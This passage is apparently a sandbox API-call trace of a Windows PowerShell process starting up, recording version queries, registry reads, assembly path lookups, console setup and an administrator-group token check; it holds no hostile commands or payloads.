lplpBuffer=0x12eb24*=0x0, puLen=0x12eb20) returned 0 [0135.020] VerQueryValueW (in: pBlock=0x2b4fad4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12eb24, puLen=0x12eb20 | out: lplpBuffer=0x12eb24*=0x0, puLen=0x12eb20) returned 0 [0135.020] VerQueryValueW (in: pBlock=0x2b4fad4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12eb18, puLen=0x12eb14 | out: lplpBuffer=0x12eb18*=0x2b4fb70, puLen=0x12eb14) returned 1 [0135.020] VerLanguageNameW (in: wLang=0x0, szLang=0x509ca8, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0135.021] VerQueryValueW (in: pBlock=0x2b4fad4, lpSubBlock="\\", lplpBuffer=0x12eb2c, puLen=0x12eb28 | out: lplpBuffer=0x12eb2c*=0x2b4fafc, puLen=0x12eb28) returned 1 [0135.026] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.026] GetLastError () returned 0xcb [0135.165] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.165] GetLastError () returned 0xcb [0135.168] lstrlenW (lpString="䅁") returned 1 [0135.171] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12eaf0 | out: phkResult=0x12eaf0*=0x328) returned 0x0 [0135.172] RegOpenKeyExW (in: hKey=0x328, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x12eaf4 | out: phkResult=0x12eaf4*=0x32c) returned 0x0 [0135.172] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12eb28 | out: phkResult=0x12eb28*=0x330) returned 0x0 [0135.174] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12eb68, lpData=0x0, lpcbData=0x12eb64*=0x0 | out: lpType=0x12eb68*=0x1, lpData=0x0, lpcbData=0x12eb64*=0x56) returned 0x0 [0135.175] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12eb68, lpData=0x509ca8, lpcbData=0x12eb64*=0x56 | out: lpType=0x12eb68*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x12eb64*=0x56) returned 0x0 [0135.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.178] GetLastError () returned 0x0 [0135.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.180] GetLastError () returned 0x0 [0135.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.293] GetLastError () returned 0x0 [0135.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.347] GetLastError () returned 0xcb [0136.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0136.775] GetLastError () returned 0x2 [0136.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0136.775] GetLastError () returned 0x2 [0137.994] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0137.994] GetLastError () returned 0xcb [0137.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0137.995] GetLastError () returned 0xcb [0138.020] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.020] GetLastError () returned 0xcb [0138.021] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.021] GetLastError () returned 0xcb [0138.021] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.021] GetLastError () returned 0xcb [0138.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0138.715] GetLastError () returned 0x0 [0138.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0138.715] GetLastError () returned 0x0 [0139.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.818] GetLastError () returned 0xcb [0139.865] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.865] GetLastError () returned 0xcb [0139.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0139.961] GetLastError () returned 0x7e [0139.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0139.961] GetLastError () returned 0x7e [0144.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0144.199] GetLastError () returned 0x2 [0144.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0144.199] GetLastError () returned 0x2 [0144.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0144.579] GetLastError () returned 0x57 [0144.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0144.579] GetLastError () returned 0x57 [0145.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0145.514] GetLastError () returned 0x2 [0145.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0145.514] GetLastError () returned 0x2 [0145.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0145.695] GetLastError () returned 0x2 [0145.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0145.695] GetLastError () returned 0x2 [0145.849] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0145.849] GetLastError () returned 0xcb [0145.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e6f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0145.850] GetLastError () returned 0xcb [0145.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e6a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0145.851] GetLastError () returned 0xcb [0145.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e6a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0145.851] GetLastError () returned 0xcb [0145.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e6a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0145.894] GetLastError () returned 0xcb [0146.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x12e63c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0146.233] GetLastError () returned 0x2 [0146.233] SetErrorMode (uMode=0x1) returned 0x1 [0146.233] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x12eae4 | out: lpFileInformation=0x12eae4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0146.233] GetLastError () returned 0x2 [0146.233] SetErrorMode (uMode=0x1) returned 0x1 [0146.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e6f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.647] GetLastError () returned 0x0 [0146.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e6a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.647] GetLastError () returned 0x0 [0146.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e6a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.648] GetLastError () returned 0x0 [0146.650] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.650] GetLastError () returned 0xcb [0146.669] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.670] GetLastError () returned 0xcb [0146.670] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.670] GetLastError () returned 0xcb [0146.736] CoCreateGuid (in: pguid=0x12ebc4 | out: pguid=0x12ebc4*(Data1=0xe0d94a61, Data2=0x7d28, Data3=0x4783, Data4=([0]=0xac, [1]=0xba, [2]=0xe9, [3]=0xbd, [4]=0xc6, [5]=0x7, [6]=0x8b, [7]=0xe0))) returned 0x0 [0146.746] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.746] GetLastError () returned 0xcb [0146.748] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.748] GetLastError () returned 0xcb [0146.750] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.750] GetLastError () returned 0xcb [0146.812] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0146.813] GetLastError () returned 0x0 [0146.814] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x12eaa4 | out: lpConsoleScreenBufferInfo=0x12eaa4) returned 1 [0146.814] GetLastError () returned 0x0 [0146.818] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0146.819] GetLastError () returned 0x0 [0146.819] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x12eaa4 | out: lpConsoleScreenBufferInfo=0x12eaa4) returned 1 [0146.819] GetLastError () returned 0x0 [0146.819] GetVersionExW (in: lpVersionInformation=0x509cc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x509cc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0146.820] GetLastError () returned 0x0 [0146.821] GetCurrentProcess () returned 0xffffffff [0146.821] GetLastError () returned 0x3f0 [0146.822] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x12eab4 | out: TokenHandle=0x12eab4*=0x34c) returned 1 [0146.822] GetLastError () returned 0x3f0 [0146.823] GetTokenInformation (in: TokenHandle=0x34c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12eb0c | out: TokenInformation=0x0, ReturnLength=0x12eb0c) returned 0 [0146.823] GetLastError () returned 0x7a [0146.824] GetTokenInformation (in: TokenHandle=0x34c, TokenInformationClass=0x8, TokenInformation=0x5098f8, TokenInformationLength=0x4, ReturnLength=0x12eb0c | out: TokenInformation=0x5098f8, ReturnLength=0x12eb0c) returned 1 [0146.824] GetLastError () returned 0x7a [0146.825] DuplicateTokenEx (in: hExistingToken=0x34c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x12eac4 | out: phNewToken=0x12eac4*=0x344) returned 1 [0146.825] GetLastError () returned 0x7f [0146.825] GetTokenInformation (in: TokenHandle=0x34c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12eb0c | out: TokenInformation=0x0, ReturnLength=0x12eb0c) returned 0 [0146.825] GetLastError () returned 0x7a [0146.825] GetTokenInformation (in: TokenHandle=0x34c, TokenInformationClass=0x8, TokenInformation=0x5098d8, TokenInformationLength=0x4, ReturnLength=0x12eb0c | out: TokenInformation=0x5098d8, ReturnLength=0x12eb0c) returned 1 [0146.825] GetLastError () returned 0x7a [0146.826] CheckTokenMembership (in: TokenHandle=0x344, SidToCheck=0x2bd2948*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x12eaa0 | out: IsMember=0x12eaa0) returned 1 [0146.826] GetLastError () returned 0x7a [0146.826] CloseHandle (hObject=0x344) returned 1 [0146.826] GetLastError () returned 0x7a [0146.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.826] GetLastError () returned 0x7a [0146.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.826] GetLastError () returned 0x7a [0146.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.826] GetLastError () returned 0x7a [0146.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.826] GetLastError () returned 0x7a [0146.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.886] GetLastError () returned 0x7a [0146.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.886] GetLastError () returned 0x7a [0146.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.887] GetLastError () returned 0x7a [0146.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.887] GetLastError () returned 0x7a [0146.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.887] GetLastError () returned 0x7a [0146.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.887] GetLastError () returned 0x7a [0146.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e5f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.887] GetLastError () returned 0x7a [0146.887] GetFullPathNameW (in: 